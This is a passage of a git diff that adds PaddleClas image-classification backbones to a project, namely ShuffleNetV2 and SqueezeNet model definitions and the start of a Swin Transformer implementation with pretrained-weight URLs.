Conv2D( + in_channels=in_channels, + out_channels=out_channels, + kernel_size=kernel_size, + stride=stride, + padding=padding, + groups=groups, + weight_attr=ParamAttr( + initializer=KaimingNormal(), name=name + "_weights"), + bias_attr=False) + + self._batch_norm = BatchNorm( + out_channels, + param_attr=ParamAttr(name=name + "_bn_scale"), + bias_attr=ParamAttr(name=name + "_bn_offset"), + act=act, + moving_mean_name=name + "_bn_mean", + moving_variance_name=name + "_bn_variance") + + def forward(self, inputs): + y = self._conv(inputs) + y = self._batch_norm(y) + return y + + +class InvertedResidual(Layer): + def __init__(self, + in_channels, + out_channels, + stride, + act="relu", + name=None): + super(InvertedResidual, self).__init__() + self._conv_pw = ConvBNLayer( + in_channels=in_channels // 2, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv1') + self._conv_dw = ConvBNLayer( + in_channels=out_channels // 2, + out_channels=out_channels // 2, + kernel_size=3, + stride=stride, + padding=1, + groups=out_channels // 2, + act=None, + name='stage_' + name + '_conv2') + self._conv_linear = ConvBNLayer( + in_channels=out_channels // 2, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv3') + + def forward(self, inputs): + x1, x2 = split( + inputs, + num_or_sections=[inputs.shape[1] // 2, inputs.shape[1] // 2], + axis=1) + x2 = self._conv_pw(x2) + x2 = self._conv_dw(x2) + x2 = self._conv_linear(x2) + out = concat([x1, x2], axis=1) + return channel_shuffle(out, 2) + + +class InvertedResidualDS(Layer): + def __init__(self, + in_channels, + out_channels, + stride, + act="relu", + name=None): + super(InvertedResidualDS, self).__init__() + + # branch1 + self._conv_dw_1 = ConvBNLayer( + in_channels=in_channels, + out_channels=in_channels, + kernel_size=3, + stride=stride, + padding=1, + groups=in_channels, + 
act=None, + name='stage_' + name + '_conv4') + self._conv_linear_1 = ConvBNLayer( + in_channels=in_channels, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv5') + # branch2 + self._conv_pw_2 = ConvBNLayer( + in_channels=in_channels, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv1') + self._conv_dw_2 = ConvBNLayer( + in_channels=out_channels // 2, + out_channels=out_channels // 2, + kernel_size=3, + stride=stride, + padding=1, + groups=out_channels // 2, + act=None, + name='stage_' + name + '_conv2') + self._conv_linear_2 = ConvBNLayer( + in_channels=out_channels // 2, + out_channels=out_channels // 2, + kernel_size=1, + stride=1, + padding=0, + groups=1, + act=act, + name='stage_' + name + '_conv3') + + def forward(self, inputs): + x1 = self._conv_dw_1(inputs) + x1 = self._conv_linear_1(x1) + x2 = self._conv_pw_2(inputs) + x2 = self._conv_dw_2(x2) + x2 = self._conv_linear_2(x2) + out = concat([x1, x2], axis=1) + + return channel_shuffle(out, 2) + + +class ShuffleNet(Layer): + def __init__(self, class_num=1000, scale=1.0, act="relu"): + super(ShuffleNet, self).__init__() + self.scale = scale + self.class_num = class_num + stage_repeats = [4, 8, 4] + + if scale == 0.25: + stage_out_channels = [-1, 24, 24, 48, 96, 512] + elif scale == 0.33: + stage_out_channels = [-1, 24, 32, 64, 128, 512] + elif scale == 0.5: + stage_out_channels = [-1, 24, 48, 96, 192, 1024] + elif scale == 1.0: + stage_out_channels = [-1, 24, 116, 232, 464, 1024] + elif scale == 1.5: + stage_out_channels = [-1, 24, 176, 352, 704, 1024] + elif scale == 2.0: + stage_out_channels = [-1, 24, 224, 488, 976, 2048] + else: + raise NotImplementedError("This scale size:[" + str(scale) + + "] is not implemented!") + # 1. 
conv1 + self._conv1 = ConvBNLayer( + in_channels=3, + out_channels=stage_out_channels[1], + kernel_size=3, + stride=2, + padding=1, + act=act, + name='stage1_conv') + self._max_pool = MaxPool2D(kernel_size=3, stride=2, padding=1) + + # 2. bottleneck sequences + self._block_list = [] + for stage_id, num_repeat in enumerate(stage_repeats): + for i in range(num_repeat): + if i == 0: + block = self.add_sublayer( + name=str(stage_id + 2) + '_' + str(i + 1), + sublayer=InvertedResidualDS( + in_channels=stage_out_channels[stage_id + 1], + out_channels=stage_out_channels[stage_id + 2], + stride=2, + act=act, + name=str(stage_id + 2) + '_' + str(i + 1))) + else: + block = self.add_sublayer( + name=str(stage_id + 2) + '_' + str(i + 1), + sublayer=InvertedResidual( + in_channels=stage_out_channels[stage_id + 2], + out_channels=stage_out_channels[stage_id + 2], + stride=1, + act=act, + name=str(stage_id + 2) + '_' + str(i + 1))) + self._block_list.append(block) + # 3. last_conv + self._last_conv = ConvBNLayer( + in_channels=stage_out_channels[-2], + out_channels=stage_out_channels[-1], + kernel_size=1, + stride=1, + padding=0, + act=act, + name='conv5') + # 4. pool + self._pool2d_avg = AdaptiveAvgPool2D(1) + self._out_c = stage_out_channels[-1] + # 5. 
fc + self._fc = Linear( + stage_out_channels[-1], + class_num, + weight_attr=ParamAttr(name='fc6_weights'), + bias_attr=ParamAttr(name='fc6_offset')) + + def forward(self, inputs): + y = self._conv1(inputs) + y = self._max_pool(y) + for inv in self._block_list: + y = inv(y) + y = self._last_conv(y) + y = self._pool2d_avg(y) + y = paddle.flatten(y, start_axis=1, stop_axis=-1) + y = self._fc(y) + return y + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def ShuffleNetV2_x0_25(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=0.25, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x0_25"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x0_33(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=0.33, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x0_33"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x0_5(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=0.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x0_5"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x1_0(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=1.0, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x1_0"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x1_5(pretrained=False, use_ssld=False, **kwargs): + model = ShuffleNet(scale=1.5, **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["ShuffleNetV2_x1_5"], use_ssld=use_ssld) + return model + + +def ShuffleNetV2_x2_0(pretrained=False, use_ssld=False, **kwargs): + model = 
def ShuffleNetV2_swish(pretrained=False, use_ssld=False, **kwargs):
    """ShuffleNetV2 x1.0 with swish activations instead of ReLU."""
    net = ShuffleNet(scale=1.0, act="swish", **kwargs)
    _load_pretrained(
        pretrained, net, MODEL_URLS["ShuffleNetV2_swish"], use_ssld=use_ssld)
    return net
class MakeFire(nn.Layer):
    """SqueezeNet Fire module: a 1x1 squeeze conv feeding parallel
    1x1 and 3x3 expand convs whose outputs are channel-concatenated."""

    def __init__(self,
                 input_channels,
                 squeeze_channels,
                 expand1x1_channels,
                 expand3x3_channels,
                 name=None):
        super().__init__()
        self._conv = MakeFireConv(
            input_channels, squeeze_channels, 1, name=name + "_squeeze1x1")
        self._conv_path1 = MakeFireConv(
            squeeze_channels, expand1x1_channels, 1, name=name + "_expand1x1")
        # The 3x3 branch pads by 1 so both branches keep the spatial size.
        self._conv_path2 = MakeFireConv(
            squeeze_channels,
            expand3x3_channels,
            3,
            padding=1,
            name=name + "_expand3x3")

    def forward(self, inputs):
        squeezed = self._conv(inputs)
        expand_1x1 = self._conv_path1(squeezed)
        expand_3x3 = self._conv_path2(squeezed)
        return paddle.concat([expand_1x1, expand_3x3], axis=1)
bias_attr=ParamAttr(name="conv1_offset")) + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self._conv1 = MakeFire(96, 16, 64, 64, name="fire2") + self._conv2 = MakeFire(128, 16, 64, 64, name="fire3") + self._conv3 = MakeFire(128, 32, 128, 128, name="fire4") + + self._conv4 = MakeFire(256, 32, 128, 128, name="fire5") + self._conv5 = MakeFire(256, 48, 192, 192, name="fire6") + self._conv6 = MakeFire(384, 48, 192, 192, name="fire7") + self._conv7 = MakeFire(384, 64, 256, 256, name="fire8") + + self._conv8 = MakeFire(512, 64, 256, 256, name="fire9") + else: + self._conv = Conv2D( + 3, + 64, + 3, + stride=2, + padding=1, + weight_attr=ParamAttr(name="conv1_weights"), + bias_attr=ParamAttr(name="conv1_offset")) + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self._conv1 = MakeFire(64, 16, 64, 64, name="fire2") + self._conv2 = MakeFire(128, 16, 64, 64, name="fire3") + + self._conv3 = MakeFire(128, 32, 128, 128, name="fire4") + self._conv4 = MakeFire(256, 32, 128, 128, name="fire5") + + self._conv5 = MakeFire(256, 48, 192, 192, name="fire6") + self._conv6 = MakeFire(384, 48, 192, 192, name="fire7") + self._conv7 = MakeFire(384, 64, 256, 256, name="fire8") + self._conv8 = MakeFire(512, 64, 256, 256, name="fire9") + + self._drop = Dropout(p=0.5, mode="downscale_in_infer") + self._conv9 = Conv2D( + 512, + class_num, + 1, + weight_attr=ParamAttr(name="conv10_weights"), + bias_attr=ParamAttr(name="conv10_offset")) + self._avg_pool = AdaptiveAvgPool2D(1) + + def forward(self, inputs): + x = self._conv(inputs) + x = F.relu(x) + x = self._pool(x) + if self.version == "1.0": + x = self._conv1(x) + x = self._conv2(x) + x = self._conv3(x) + x = self._pool(x) + x = self._conv4(x) + x = self._conv5(x) + x = self._conv6(x) + x = self._conv7(x) + x = self._pool(x) + x = self._conv8(x) + else: + x = self._conv1(x) + x = self._conv2(x) + x = self._pool(x) + x = self._conv3(x) + x = self._conv4(x) + x = self._pool(x) + x = self._conv5(x) + x = self._conv6(x) + x 
= self._conv7(x) + x = self._conv8(x) + x = self._drop(x) + x = self._conv9(x) + x = F.relu(x) + x = self._avg_pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def SqueezeNet1_0(pretrained=False, use_ssld=False, **kwargs): + model = SqueezeNet(version="1.0", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SqueezeNet1_0"], use_ssld=use_ssld) + return model + + +def SqueezeNet1_1(pretrained=False, use_ssld=False, **kwargs): + model = SqueezeNet(version="1.1", **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["SqueezeNet1_1"], use_ssld=use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/swin_transformer.py b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/swin_transformer.py new file mode 100644 index 0000000..8ce810c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/model_zoo/swin_transformer.py @@ -0,0 +1,856 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+# Reference: https://github.com/microsoft/Swin-Transformer + +import numpy as np +import paddle +import paddle.nn as nn +import paddle.nn.functional as F +from paddle.nn.initializer import TruncatedNormal, Constant + +from .vision_transformer import trunc_normal_, zeros_, ones_, to_2tuple, DropPath, Identity + +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "SwinTransformer_tiny_patch4_window7_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_tiny_patch4_window7_224_pretrained.pdparams", + "SwinTransformer_small_patch4_window7_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_small_patch4_window7_224_pretrained.pdparams", + "SwinTransformer_base_patch4_window7_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_base_patch4_window7_224_pretrained.pdparams", + "SwinTransformer_base_patch4_window12_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_base_patch4_window12_384_pretrained.pdparams", + "SwinTransformer_large_patch4_window7_224": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_large_patch4_window7_224_22kto1k_pretrained.pdparams", + "SwinTransformer_large_patch4_window12_384": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/SwinTransformer_large_patch4_window12_384_22kto1k_pretrained.pdparams", +} + +__all__ = list(MODEL_URLS.keys()) + + +class Mlp(nn.Layer): + def __init__(self, + in_features, + hidden_features=None, + out_features=None, + act_layer=nn.GELU, + drop=0.): + super().__init__() + out_features = out_features or in_features + hidden_features = hidden_features or in_features + self.fc1 = nn.Linear(in_features, hidden_features) + self.act = act_layer() + self.fc2 = nn.Linear(hidden_features, out_features) + self.drop = nn.Dropout(drop) + + def forward(self, x): + x = self.fc1(x) + x = self.act(x) + x = self.drop(x) + x 
def window_partition(x, window_size):
    """Split a feature map into non-overlapping square windows.

    Args:
        x: tensor of shape (B, H, W, C).
        window_size (int): side length of each window.

    Returns:
        Tensor of shape (num_windows * B, window_size, window_size, C).
    """
    batch, height, width, channels = x.shape
    rows = height // window_size
    cols = width // window_size
    tiled = x.reshape(
        [batch, rows, window_size, cols, window_size, channels])
    # Bring the two window-grid axes next to each other, then fold the
    # per-image window grid into the batch axis.
    windows = tiled.transpose([0, 1, 3, 2, 4, 5])
    return windows.reshape([-1, window_size, window_size, channels])


def window_reverse(windows, window_size, H, W, C):
    """Inverse of `window_partition`: reassemble windows into a feature map.

    Args:
        windows: tensor of shape (num_windows * B, window_size, window_size, C).
        window_size (int): side length of each window.
        H (int): height of the original feature map.
        W (int): width of the original feature map.
        C (int): channel count of the original feature map.

    Returns:
        Tensor of shape (B, H, W, C).
    """
    rows = H // window_size
    cols = W // window_size
    grid = windows.reshape(
        [-1, rows, cols, window_size, window_size, C])
    restored = grid.transpose([0, 1, 3, 2, 4, 5])
    return restored.reshape([-1, H, W, C])
Default: 0.0 + """ + + def __init__(self, + dim, + window_size, + num_heads, + qkv_bias=True, + qk_scale=None, + attn_drop=0., + proj_drop=0.): + super().__init__() + self.dim = dim + self.window_size = window_size # Wh, Ww + self.num_heads = num_heads + head_dim = dim // num_heads + self.scale = qk_scale or head_dim**-0.5 + + # define a parameter table of relative position bias + # 2*Wh-1 * 2*Ww-1, nH + self.relative_position_bias_table = self.create_parameter( + shape=((2 * window_size[0] - 1) * (2 * window_size[1] - 1), + num_heads), + default_initializer=zeros_) + self.add_parameter("relative_position_bias_table", + self.relative_position_bias_table) + + # get pair-wise relative position index for each token inside the window + coords_h = paddle.arange(self.window_size[0]) + coords_w = paddle.arange(self.window_size[1]) + coords = paddle.stack(paddle.meshgrid( + [coords_h, coords_w])) # 2, Wh, Ww + coords_flatten = paddle.flatten(coords, 1) # 2, Wh*Ww + + coords_flatten_1 = coords_flatten.unsqueeze(axis=2) + coords_flatten_2 = coords_flatten.unsqueeze(axis=1) + relative_coords = coords_flatten_1 - coords_flatten_2 + + relative_coords = relative_coords.transpose( + [1, 2, 0]) # Wh*Ww, Wh*Ww, 2 + relative_coords[:, :, 0] += self.window_size[ + 0] - 1 # shift to start from 0 + relative_coords[:, :, 1] += self.window_size[1] - 1 + relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1 + relative_position_index = relative_coords.sum(-1) # Wh*Ww, Wh*Ww + self.register_buffer("relative_position_index", + relative_position_index) + + self.qkv = nn.Linear(dim, dim * 3, bias_attr=qkv_bias) + self.attn_drop = nn.Dropout(attn_drop) + self.proj = nn.Linear(dim, dim) + self.proj_drop = nn.Dropout(proj_drop) + + trunc_normal_(self.relative_position_bias_table) + self.softmax = nn.Softmax(axis=-1) + + def forward(self, x, mask=None): + """ + Args: + x: input features with shape of (num_windows*B, N, C) + mask: (0/-inf) mask with shape of (num_windows, Wh*Ww, Wh*Ww) or None + 
""" + B_, N, C = x.shape + qkv = self.qkv(x).reshape( + [B_, N, 3, self.num_heads, C // self.num_heads]).transpose( + [2, 0, 3, 1, 4]) + q, k, v = qkv[0], qkv[1], qkv[2] + + q = q * self.scale + attn = paddle.mm(q, k.transpose([0, 1, 3, 2])) + + index = self.relative_position_index.reshape([-1]) + + relative_position_bias = paddle.index_select( + self.relative_position_bias_table, index) + relative_position_bias = relative_position_bias.reshape([ + self.window_size[0] * self.window_size[1], + self.window_size[0] * self.window_size[1], -1 + ]) # Wh*Ww,Wh*Ww,nH + + relative_position_bias = relative_position_bias.transpose( + [2, 0, 1]) # nH, Wh*Ww, Wh*Ww + attn = attn + relative_position_bias.unsqueeze(0) + + if mask is not None: + nW = mask.shape[0] + attn = attn.reshape([B_ // nW, nW, self.num_heads, N, N + ]) + mask.unsqueeze(1).unsqueeze(0) + attn = attn.reshape([-1, self.num_heads, N, N]) + attn = self.softmax(attn) + else: + attn = self.softmax(attn) + + attn = self.attn_drop(attn) + + # x = (attn @ v).transpose(1, 2).reshape([B_, N, C]) + x = paddle.mm(attn, v).transpose([0, 2, 1, 3]).reshape([B_, N, C]) + x = self.proj(x) + x = self.proj_drop(x) + return x + + def extra_repr(self): + return "dim={}, window_size={}, num_heads={}".format( + self.dim, self.window_size, self.num_heads) + + def flops(self, N): + # calculate flops for 1 window with token length of N + flops = 0 + # qkv = self.qkv(x) + flops += N * self.dim * 3 * self.dim + # attn = (q @ k.transpose(-2, -1)) + flops += self.num_heads * N * (self.dim // self.num_heads) * N + # x = (attn @ v) + flops += self.num_heads * N * N * (self.dim // self.num_heads) + # x = self.proj(x) + flops += N * self.dim * self.dim + return flops + + +class SwinTransformerBlock(nn.Layer): + r""" Swin Transformer Block. + + Args: + dim (int): Number of input channels. + input_resolution (tuple[int]): Input resulotion. + num_heads (int): Number of attention heads. + window_size (int): Window size. 
+ shift_size (int): Shift size for SW-MSA. + mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. + qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True + qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. + drop (float, optional): Dropout rate. Default: 0.0 + attn_drop (float, optional): Attention dropout rate. Default: 0.0 + drop_path (float, optional): Stochastic depth rate. Default: 0.0 + act_layer (nn.Layer, optional): Activation layer. Default: nn.GELU + norm_layer (nn.Layer, optional): Normalization layer. Default: nn.LayerNorm + """ + + def __init__(self, + dim, + input_resolution, + num_heads, + window_size=7, + shift_size=0, + mlp_ratio=4., + qkv_bias=True, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + act_layer=nn.GELU, + norm_layer=nn.LayerNorm): + super().__init__() + self.dim = dim + self.input_resolution = input_resolution + self.num_heads = num_heads + self.window_size = window_size + self.shift_size = shift_size + self.mlp_ratio = mlp_ratio + if min(self.input_resolution) <= self.window_size: + # if window size is larger than input resolution, we don't partition windows + self.shift_size = 0 + self.window_size = min(self.input_resolution) + assert 0 <= self.shift_size < self.window_size, "shift_size must in 0-window_size" + + self.norm1 = norm_layer(dim) + self.attn = WindowAttention( + dim, + window_size=to_2tuple(self.window_size), + num_heads=num_heads, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + attn_drop=attn_drop, + proj_drop=drop) + + self.drop_path = DropPath(drop_path) if drop_path > 0. 
else Identity() + self.norm2 = norm_layer(dim) + mlp_hidden_dim = int(dim * mlp_ratio) + self.mlp = Mlp(in_features=dim, + hidden_features=mlp_hidden_dim, + act_layer=act_layer, + drop=drop) + + if self.shift_size > 0: + # calculate attention mask for SW-MSA + H, W = self.input_resolution + img_mask = paddle.zeros((1, H, W, 1)) # 1 H W 1 + h_slices = (slice(0, -self.window_size), + slice(-self.window_size, -self.shift_size), + slice(-self.shift_size, None)) + w_slices = (slice(0, -self.window_size), + slice(-self.window_size, -self.shift_size), + slice(-self.shift_size, None)) + cnt = 0 + for h in h_slices: + for w in w_slices: + img_mask[:, h, w, :] = cnt + cnt += 1 + + mask_windows = window_partition( + img_mask, self.window_size) # nW, window_size, window_size, 1 + mask_windows = mask_windows.reshape( + [-1, self.window_size * self.window_size]) + attn_mask = mask_windows.unsqueeze(1) - mask_windows.unsqueeze(2) + + huns = -100.0 * paddle.ones_like(attn_mask) + attn_mask = huns * (attn_mask != 0).astype("float32") + else: + attn_mask = None + + self.register_buffer("attn_mask", attn_mask) + + def forward(self, x): + H, W = self.input_resolution + B, L, C = x.shape + assert L == H * W, "input feature has wrong size" + + shortcut = x + x = self.norm1(x) + x = x.reshape([B, H, W, C]) + + # cyclic shift + if self.shift_size > 0: + shifted_x = paddle.roll( + x, shifts=(-self.shift_size, -self.shift_size), axis=(1, 2)) + else: + shifted_x = x + + # partition windows + x_windows = window_partition( + shifted_x, self.window_size) # nW*B, window_size, window_size, C + x_windows = x_windows.reshape( + [-1, self.window_size * self.window_size, + C]) # nW*B, window_size*window_size, C + + # W-MSA/SW-MSA + attn_windows = self.attn( + x_windows, mask=self.attn_mask) # nW*B, window_size*window_size, C + + # merge windows + attn_windows = attn_windows.reshape( + [-1, self.window_size, self.window_size, C]) + shifted_x = window_reverse(attn_windows, self.window_size, H, W, + C) 
# B H' W' C + + # reverse cyclic shift + if self.shift_size > 0: + x = paddle.roll( + shifted_x, + shifts=(self.shift_size, self.shift_size), + axis=(1, 2)) + else: + x = shifted_x + x = x.reshape([B, H * W, C]) + + # FFN + x = shortcut + self.drop_path(x) + x = x + self.drop_path(self.mlp(self.norm2(x))) + + return x + + def extra_repr(self): + return "dim={}, input_resolution={}, num_heads={}, window_size={}, shift_size={}, mlp_ratio={}".format( + self.dim, self.input_resolution, self.num_heads, self.window_size, + self.shift_size, self.mlp_ratio) + + def flops(self): + flops = 0 + H, W = self.input_resolution + # norm1 + flops += self.dim * H * W + # W-MSA/SW-MSA + nW = H * W / self.window_size / self.window_size + flops += nW * self.attn.flops(self.window_size * self.window_size) + # mlp + flops += 2 * H * W * self.dim * self.dim * self.mlp_ratio + # norm2 + flops += self.dim * H * W + return flops + + +class PatchMerging(nn.Layer): + r""" Patch Merging Layer. + + Args: + input_resolution (tuple[int]): Resolution of input feature. + dim (int): Number of input channels. + norm_layer (nn.Layer, optional): Normalization layer. 
Default: nn.LayerNorm + """ + + def __init__(self, input_resolution, dim, norm_layer=nn.LayerNorm): + super().__init__() + self.input_resolution = input_resolution + self.dim = dim + self.reduction = nn.Linear(4 * dim, 2 * dim, bias_attr=False) + self.norm = norm_layer(4 * dim) + + def forward(self, x): + """ + x: B, H*W, C + """ + H, W = self.input_resolution + B, L, C = x.shape + assert L == H * W, "input feature has wrong size" + assert H % 2 == 0 and W % 2 == 0, "x size ({}*{}) are not even.".format( + H, W) + + x = x.reshape([B, H, W, C]) + + x0 = x[:, 0::2, 0::2, :] # B H/2 W/2 C + x1 = x[:, 1::2, 0::2, :] # B H/2 W/2 C + x2 = x[:, 0::2, 1::2, :] # B H/2 W/2 C + x3 = x[:, 1::2, 1::2, :] # B H/2 W/2 C + x = paddle.concat([x0, x1, x2, x3], -1) # B H/2 W/2 4*C + x = x.reshape([B, H * W // 4, 4 * C]) # B H/2*W/2 4*C + + x = self.norm(x) + x = self.reduction(x) + + return x + + def extra_repr(self): + return "input_resolution={}, dim={}".format(self.input_resolution, + self.dim) + + def flops(self): + H, W = self.input_resolution + flops = H * W * self.dim + flops += (H // 2) * (W // 2) * 4 * self.dim * 2 * self.dim + return flops + + +class BasicLayer(nn.Layer): + """ A basic Swin Transformer layer for one stage. + + Args: + dim (int): Number of input channels. + input_resolution (tuple[int]): Input resolution. + depth (int): Number of blocks. + num_heads (int): Number of attention heads. + window_size (int): Local window size. + mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. + qkv_bias (bool, optional): If True, add a learnable bias to query, key, value. Default: True + qk_scale (float | None, optional): Override default qk scale of head_dim ** -0.5 if set. + drop (float, optional): Dropout rate. Default: 0.0 + attn_drop (float, optional): Attention dropout rate. Default: 0.0 + drop_path (float | tuple[float], optional): Stochastic depth rate. Default: 0.0 + norm_layer (nn.Layer, optional): Normalization layer. 
Default: nn.LayerNorm + downsample (nn.Layer | None, optional): Downsample layer at the end of the layer. Default: None + use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False. + """ + + def __init__(self, + dim, + input_resolution, + depth, + num_heads, + window_size, + mlp_ratio=4., + qkv_bias=True, + qk_scale=None, + drop=0., + attn_drop=0., + drop_path=0., + norm_layer=nn.LayerNorm, + downsample=None, + use_checkpoint=False): + + super().__init__() + self.dim = dim + self.input_resolution = input_resolution + self.depth = depth + self.use_checkpoint = use_checkpoint + + # build blocks + self.blocks = nn.LayerList([ + SwinTransformerBlock( + dim=dim, + input_resolution=input_resolution, + num_heads=num_heads, + window_size=window_size, + shift_size=0 if (i % 2 == 0) else window_size // 2, + mlp_ratio=mlp_ratio, + qkv_bias=qkv_bias, + qk_scale=qk_scale, + drop=drop, + attn_drop=attn_drop, + drop_path=drop_path[i] + if isinstance(drop_path, list) else drop_path, + norm_layer=norm_layer) for i in range(depth) + ]) + + # patch merging layer + if downsample is not None: + self.downsample = downsample( + input_resolution, dim=dim, norm_layer=norm_layer) + else: + self.downsample = None + + def forward(self, x): + for blk in self.blocks: + x = blk(x) + if self.downsample is not None: + x = self.downsample(x) + return x + + def extra_repr(self): + return "dim={}, input_resolution={}, depth={}".format( + self.dim, self.input_resolution, self.depth) + + def flops(self): + flops = 0 + for blk in self.blocks: + flops += blk.flops() + if self.downsample is not None: + flops += self.downsample.flops() + return flops + + +class PatchEmbed(nn.Layer): + """ Image to Patch Embedding + + Args: + img_size (int): Image size. Default: 224. + patch_size (int): Patch token size. Default: 4. + in_chans (int): Number of input image channels. Default: 3. + embed_dim (int): Number of linear projection output channels. Default: 96. 
+ norm_layer (nn.Layer, optional): Normalization layer. Default: None + """ + + def __init__(self, + img_size=224, + patch_size=4, + in_chans=3, + embed_dim=96, + norm_layer=None): + super().__init__() + img_size = to_2tuple(img_size) + patch_size = to_2tuple(patch_size) + patches_resolution = [ + img_size[0] // patch_size[0], img_size[1] // patch_size[1] + ] + self.img_size = img_size + self.patch_size = patch_size + self.patches_resolution = patches_resolution + self.num_patches = patches_resolution[0] * patches_resolution[1] + + self.in_chans = in_chans + self.embed_dim = embed_dim + + self.proj = nn.Conv2D( + in_chans, embed_dim, kernel_size=patch_size, stride=patch_size) + if norm_layer is not None: + self.norm = norm_layer(embed_dim) + else: + self.norm = None + + def forward(self, x): + B, C, H, W = x.shape + # TODO (littletomatodonkey), uncomment the line will cause failure of jit.save + # assert [H, W] == self.img_size[:2], "Input image size ({H}*{W}) doesn't match model ({}*{}).".format(H, W, self.img_size[0], self.img_size[1]) + x = self.proj(x) + + x = x.flatten(2).transpose([0, 2, 1]) # B Ph*Pw C + if self.norm is not None: + x = self.norm(x) + return x + + def flops(self): + Ho, Wo = self.patches_resolution + flops = Ho * Wo * self.embed_dim * self.in_chans * ( + self.patch_size[0] * self.patch_size[1]) + if self.norm is not None: + flops += Ho * Wo * self.embed_dim + return flops + + +class SwinTransformer(nn.Layer): + """ Swin Transformer + A PaddlePaddle impl of : `Swin Transformer: Hierarchical Vision Transformer using Shifted Windows` - + https://arxiv.org/pdf/2103.14030 + + Args: + img_size (int | tuple(int)): Input image size. Default 224 + patch_size (int | tuple(int)): Patch size. Default: 4 + in_chans (int): Number of input image channels. Default: 3 + num_classes (int): Number of classes for classification head. Default: 1000 + embed_dim (int): Patch embedding dimension. 
Default: 96 + depths (tuple(int)): Depth of each Swin Transformer layer. + num_heads (tuple(int)): Number of attention heads in different layers. + window_size (int): Window size. Default: 7 + mlp_ratio (float): Ratio of mlp hidden dim to embedding dim. Default: 4 + qkv_bias (bool): If True, add a learnable bias to query, key, value. Default: True + qk_scale (float): Override default qk scale of head_dim ** -0.5 if set. Default: None + drop_rate (float): Dropout rate. Default: 0 + attn_drop_rate (float): Attention dropout rate. Default: 0 + drop_path_rate (float): Stochastic depth rate. Default: 0.1 + norm_layer (nn.Layer): Normalization layer. Default: nn.LayerNorm. + ape (bool): If True, add absolute position embedding to the patch embedding. Default: False + patch_norm (bool): If True, add normalization after patch embedding. Default: True + use_checkpoint (bool): Whether to use checkpointing to save memory. Default: False + """ + + def __init__(self, + img_size=224, + patch_size=4, + in_chans=3, + class_num=1000, + embed_dim=96, + depths=[2, 2, 6, 2], + num_heads=[3, 6, 12, 24], + window_size=7, + mlp_ratio=4., + qkv_bias=True, + qk_scale=None, + drop_rate=0., + attn_drop_rate=0., + drop_path_rate=0.1, + norm_layer=nn.LayerNorm, + ape=False, + patch_norm=True, + use_checkpoint=False, + **kwargs): + super(SwinTransformer, self).__init__() + + self.num_classes = num_classes = class_num + self.num_layers = len(depths) + self.embed_dim = embed_dim + self.ape = ape + self.patch_norm = patch_norm + self.num_features = int(embed_dim * 2**(self.num_layers - 1)) + self.mlp_ratio = mlp_ratio + + # split image into non-overlapping patches + 